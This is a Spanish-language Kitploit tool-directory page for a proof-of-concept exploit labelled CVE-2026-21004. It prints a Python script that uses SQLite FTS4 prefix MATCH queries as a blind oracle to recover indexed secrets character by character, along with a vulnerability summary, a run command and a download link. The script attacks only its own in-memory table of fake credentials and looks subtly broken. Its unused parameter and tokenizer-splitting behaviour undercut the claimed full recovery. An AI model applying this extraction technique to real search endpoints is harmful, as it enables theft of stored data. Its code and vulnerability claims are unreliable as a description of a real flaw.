Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — Exploit de prueba de concepto para CVE-2026-21004: usa consultas de prefijo MATCH FTS3/4 de SQLite manipuladas como un oráculo ciego para recuperar datos secretos indexados carácter por carácter. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosSeguridad de Bases de Datos
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Exploit de prueba de concepto para CVE-2026-21004: usa consultas de prefijo MATCH FTS3/4 de SQLite manipuladas como un oráculo ciego para recuperar datos secretos indexados carácter por carácter.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 16 díasAún no revisado

CVE-2026-21004 – Fuga de información de coincidencias SQLite FTS3 mediante manipulación de consultas

Código del programa (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – Fuga de información de coincidencias SQLite FTS3/4

Severity: High

Resumen

Una aplicación que utiliza SQLite FTS4 expone una función de búsqueda que devuelve resultados basados en una consulta MATCH. Al observar si se produce una coincidencia (o diferencias de temporización), un atacante puede forzar por fuerza bruta el contenido del índice de texto completo carácter por carácter, extrayendo datos sensibles.

Detalles de la vulnerabilidad

  • Tipo: Divulgación de información / Inyección ciega
  • Impacto: Exfiltración de datos de columnas indexadas.
  • Causa raíz: El operador MATCH de FTS admite consultas de prefijo (term*), lo que permite a un atacante realizar un ataque de diccionario sin conocer el término completo.

Demostración del exploit

Ejecute el exploit:

root@kitploit:~
python sqlite_fts_leak.py

El script recupera progresivamente el contenido de la tabla secrets.

Descargar herramienta